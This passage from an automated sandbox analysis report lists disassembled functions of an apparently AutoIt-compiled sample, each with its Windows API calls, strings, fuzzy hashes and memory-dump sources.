Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: b3dd11f961a9e1d15629d93a7b5df6ff9b45a00f7f9a8c32c697a1402ac1ed33
Instruction ID: bb791d58aa421d601845515162aba5e74372324a1167ca8b0d5217aefe2b7860
Opcode Fuzzy Hash: b3dd11f961a9e1d15629d93a7b5df6ff9b45a00f7f9a8c32c697a1402ac1ed33
Instruction Fuzzy Hash: E031C139200205DFDF20CF6CD485EAA77E1EF55318F248059E9158B3A2DB3AEE45C760

Function 007A4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007A4705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007A4713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007A471A

Strings

msctls_updown32, xrefs: 007A4684

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 3c76bd6ae7b1db2a11920360a4ac4df382e46a194a8cf3224dc7926a51261daa
Instruction ID: b7d2906d0d5e513b5d04e727497ccc2fb3d12f422bc42597d08dd2cc706a5bdf
Opcode Fuzzy Hash: 3c76bd6ae7b1db2a11920360a4ac4df382e46a194a8cf3224dc7926a51261daa
Instruction Fuzzy Hash: 7C218EB5601248AFDB11DF68DCC5DBB37ADEB8B394B040159FA009B2A1DB79EC11CA60

Function 007795AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0077961D

Strings

#OnAutoItStartRegister, xrefs: 007795F3
#notrayicon, xrefs: 007795B7
#requireadmin, xrefs: 007795D9

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 8eebd64a0398c79491ae761b6ae5e42bbd650d2f1f9984c4611b27852f2f15c4
Instruction ID: 6966fdb1e75230f2e2e7bd959d43cbe6a4b173bdeafac0ca29037489b0d1b008
Opcode Fuzzy Hash: 8eebd64a0398c79491ae761b6ae5e42bbd650d2f1f9984c4611b27852f2f15c4
Instruction Fuzzy Hash: 44218E72205221A6DB31BB289C06FB773E89F91340F00C125FA4DD70C1EB6CAD51C2A2

Function 007A37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007A3840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007A3850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007A3876

Strings

Listbox, xrefs: 007A380F

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 9b52db193cd7c6c540c6c49aeafc5c2d12814f6a9a48e01899099dccab0a5a4f
Instruction ID: c7b738c0517dcde02b8fb7d1c93edcd13d1bd1b6b90fb76676e43006c476e999
Opcode Fuzzy Hash: 9b52db193cd7c6c540c6c49aeafc5c2d12814f6a9a48e01899099dccab0a5a4f
Instruction Fuzzy Hash: 7A219272610118BBEF119F54CC85FBB376EEFCA760F108225F9049B190CA79DC518BA0

Function 007849F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00784A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00784A5C
SetErrorMode.KERNEL32(00000000,?,?,007ACC08), ref: 00784AD0

Strings

%lu, xrefs: 00784A6F

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 7580c8df02931548c1ebcb008e54089aa4b2074ed06a6489026ce76f5fb22e48
Instruction ID: 2cf1e1071e9ceaee18450825b7ce8f0c4384a46a3d3c442106315d4aca06d1c5
Opcode Fuzzy Hash: 7580c8df02931548c1ebcb008e54089aa4b2074ed06a6489026ce76f5fb22e48
Instruction Fuzzy Hash: 84318071A00109EFDB10DF64C885EAA7BF8EF49304F1480A5E909DB352D779EE45CBA1

Function 007A41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007A424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007A4264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007A4271

Strings

msctls_trackbar32, xrefs: 007A4226

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 0af5ebfb6504c6ffae02595068ac5c49ee1c2e5a969de4cd20c041814b00dab6
Instruction ID: cda1c2b61fd809b9c7486efab032f7316ad37d09b26149167efd2173357fb50b
Opcode Fuzzy Hash: 0af5ebfb6504c6ffae02595068ac5c49ee1c2e5a969de4cd20c041814b00dab6
Instruction Fuzzy Hash: 3711E331240248BEEF209F28CC46FAB3BACEFC6B64F010224FA55E60D0D6B6DC519B50

Function 00772F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00716B57: _wcslen.LIBCMT ref: 00716B6A

Part of subcall function 00772DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00772DC5
Part of subcall function 00772DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00772DD6
Part of subcall function 00772DA7: GetCurrentThreadId.KERNEL32 ref: 00772DDD
Part of subcall function 00772DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00772DE4

GetFocus.USER32 ref: 00772F78

Part of subcall function 00772DEE: GetParent.USER32(00000000), ref: 00772DF9

GetClassNameW.USER32(?,?,00000100), ref: 00772FC3
EnumChildWindows.USER32(?,0077303B), ref: 00772FEB

Strings

%s%d, xrefs: 00772FFF

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 9ebd0e65082ad258e10f4ce4130aa19a9e80299a1fe7324aa658ac97e89b7ec5
Instruction ID: f02ec294058f1f38194d3b084fe81b8a1fa81705e747e12ca59d31a238df716b
Opcode Fuzzy Hash: 9ebd0e65082ad258e10f4ce4130aa19a9e80299a1fe7324aa658ac97e89b7ec5
Instruction Fuzzy Hash: EE11C0B1700205ABCF55AF748C89EED376AAF84344F048075B90D9B292DE389946DB60

Function 007A5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007A58C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007A58EE
DrawMenuBar.USER32(?), ref: 007A58FD

Strings

0, xrefs: 007A588F

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 733ed4e6c92cd1fb1d92913a58546f77062092fc5f9a36272f90d4a74a3173af
Instruction ID: b43f26ae942a84c06d9ed399d1c68996218107ec926403f1a6ebce1848a24ec7
Opcode Fuzzy Hash: 733ed4e6c92cd1fb1d92913a58546f77062092fc5f9a36272f90d4a74a3173af
Instruction Fuzzy Hash: 99014431900218EFDB129F11EC44BAFBBB4FF86361F1481A9F849DA151DB389A94DF21

Function 0077007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9131d43242ec15843ad5f45515ecbd81dfb01368c007d4829049b87c53bfd0a2
Instruction ID: 680d0f7f0b95b71db0649cdabc67f279abb0c8bc59101be49d706543f4e9c7e9
Opcode Fuzzy Hash: 9131d43242ec15843ad5f45515ecbd81dfb01368c007d4829049b87c53bfd0a2
Instruction Fuzzy Hash: 8DC16C75A0020AEFDB14CFA4C898EAEB7B5FF48354F208598E509EB251D735ED41DB90

Function 0079342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00793459
CoUninitialize.OLE32 ref: 00793463
VariantInit.OLEAUT32(?), ref: 0079346E
VariantClear.OLEAUT32(?), ref: 0079371B

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: fa29cbd7a4b7e59fcaf4ae133ec46e1059f41bfb37d60f4718a35a19f84cd2fa
Instruction ID: ef903cef02cfdb4cbe792d853964af5b248a9e606601f98a7a83fce1119c4696
Opcode Fuzzy Hash: fa29cbd7a4b7e59fcaf4ae133ec46e1059f41bfb37d60f4718a35a19f84cd2fa
Instruction Fuzzy Hash: 16A14B75204200DFCB14DF68D489A6AB7E5FF8C714F058859F98A9B3A2DB38ED41CB91

Function 00770436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,007AFC08,?), ref: 007705F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,007AFC08,?), ref: 00770608
CLSIDFromProgID.OLE32(?,?,00000000,007ACC40,000000FF,?,00000000,00000800,00000000,?,007AFC08,?), ref: 0077062D
_memcmp.LIBVCRUNTIME ref: 0077064E

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 3a204f9d604fae1e357c916efc40f19b4a13ce603aa676a07c6ec340e3d7600b
Instruction ID: a650563f9ec91edc1a4ca41e0cd362376e373c8add486a579514354c8e86298b
Opcode Fuzzy Hash: 3a204f9d604fae1e357c916efc40f19b4a13ce603aa676a07c6ec340e3d7600b
Instruction Fuzzy Hash: 2C81F971A00109EFCF04DF94C988DEEB7B9FF89355B208558E506AB250DB75AE46CBA0

Function 00751391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 007514C0

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: c8371bfda78ec510951f3e52178d544537f9808201c68fd0a6ab7e5f175e7337
Instruction ID: 4601103d830c9f6ffe4c2a264c590a4605d009bf7ebc0a9833f63e991a09344d
Opcode Fuzzy Hash: c8371bfda78ec510951f3e52178d544537f9808201c68fd0a6ab7e5f175e7337
Instruction Fuzzy Hash: 62411932A00140EBEB216BBD9C49BEF3AA4EF41373F544225FC19D6192E7BC4C455661

Function 007A6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(012FE7F8,?), ref: 007A62E2
ScreenToClient.USER32(?,?), ref: 007A6315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 007A6382

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 1990292e2e5484b8a5cd53365201baba46e0165392aa680a69fd7fdd44bb544f
Instruction ID: 4efc3d8766e671c9d28c09bd4894cc893af8fa824a035af67feaa425aa908cc0
Opcode Fuzzy Hash: 1990292e2e5484b8a5cd53365201baba46e0165392aa680a69fd7fdd44bb544f
Instruction Fuzzy Hash: BA515E75A00249EFCF10DF68D881AAE7BB5FF86360F148269F9159B290D738ED81CB50

Function 00791AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00791AFD
WSAGetLastError.WSOCK32 ref: 00791B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00791B8A
WSAGetLastError.WSOCK32 ref: 00791B94

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 78b70921772a9e7e2707af4e3a7ca833293cc3b18a167f68ceda00b7d794ea14
Instruction ID: 1b7e1cf504daa74eb1ed0183a66106693f091b1087c9bbef8ef46b45fc3a64fb
Opcode Fuzzy Hash: 78b70921772a9e7e2707af4e3a7ca833293cc3b18a167f68ceda00b7d794ea14
Instruction Fuzzy Hash: 9041E574640200AFDB20AF24D88AF6577E5AB45718F54C448F5159F3D3D77AED82CB90

Function 0074B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61cac57aa9287b8374a46b73fc1356cae6cb878f8e4470574e93781097825df
Instruction ID: 1d3e6dad07d3bd57f1bf9b48819d2b219963d40529dedb8215219bb202d63f3d
Opcode Fuzzy Hash: c61cac57aa9287b8374a46b73fc1356cae6cb878f8e4470574e93781097825df
Instruction Fuzzy Hash: 11412872A00344FFD7259F3CCC49BAABBA9EB88710F10452AF555DB282D779ED118780

Function 007856D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00785783
GetLastError.KERNEL32(?,00000000), ref: 007857A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007857CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007857FA

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 5cd7e7d8f1ccf8de81665dcd7f44703fa1d4493f1b672674e2b1789c73a33587
Instruction ID: aedc73a5447bb7f83f07bf479572ed346029bf79406350a10ed640fbdfa898ce
Opcode Fuzzy Hash: 5cd7e7d8f1ccf8de81665dcd7f44703fa1d4493f1b672674e2b1789c73a33587
Instruction Fuzzy Hash: 7E411E35600610DFCB15EF59C549A5DBBF2EF89720B19C488E84A5B3A2CB38FD41CB91

Function 0074D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00736D71,00000000,00000000,007382D9,?,007382D9,?,00000001,00736D71,?,00000001,007382D9,007382D9), ref: 0074D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0074D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0074D9AB
__freea.LIBCMT ref: 0074D9B4

Part of subcall function 00743820: RtlAllocateHeap.NTDLL(00000000,?,007E1444,?,0072FDF5,?,?,0071A976,00000010,007E1440,007113FC,?,007113C6,?,00711129), ref: 00743852

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 56c7eb64f4952d8d1a7dc259f83e30ae78b1513fe4994ddbf1153ebcfce38c6e
Instruction ID: 4b1d5987b2e5c612e5c0f20e73591c6447116879a260695939e46a2cd126b87e
Opcode Fuzzy Hash: 56c7eb64f4952d8d1a7dc259f83e30ae78b1513fe4994ddbf1153ebcfce38c6e
Instruction Fuzzy Hash: 7631BC72A0020AEBDF259F64DC45EBE7BA5EB41710F054168FC44D7291EB39ED50CBA0

Function 007A52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 007A5352
GetWindowLongW.USER32(?,000000F0), ref: 007A5375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 007A5382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007A53A8

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 8ec24d115c66e371fc198c9fe6d45fa2443054b903ce79c399e312ea844aafc4
Instruction ID: f8253f47388bd5e7af9bedd8ed2b26ba5eb8b11a6f090372afef422abf016b0e
Opcode Fuzzy Hash: 8ec24d115c66e371fc198c9fe6d45fa2443054b903ce79c399e312ea844aafc4
Instruction Fuzzy Hash: DE31C234A56A08FFEF349B14CC56BE83765ABC7398F584201FA11961E1C7BCA980DB42

Function 0077AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0077ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0077AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0077AC74
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0077ACC6

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
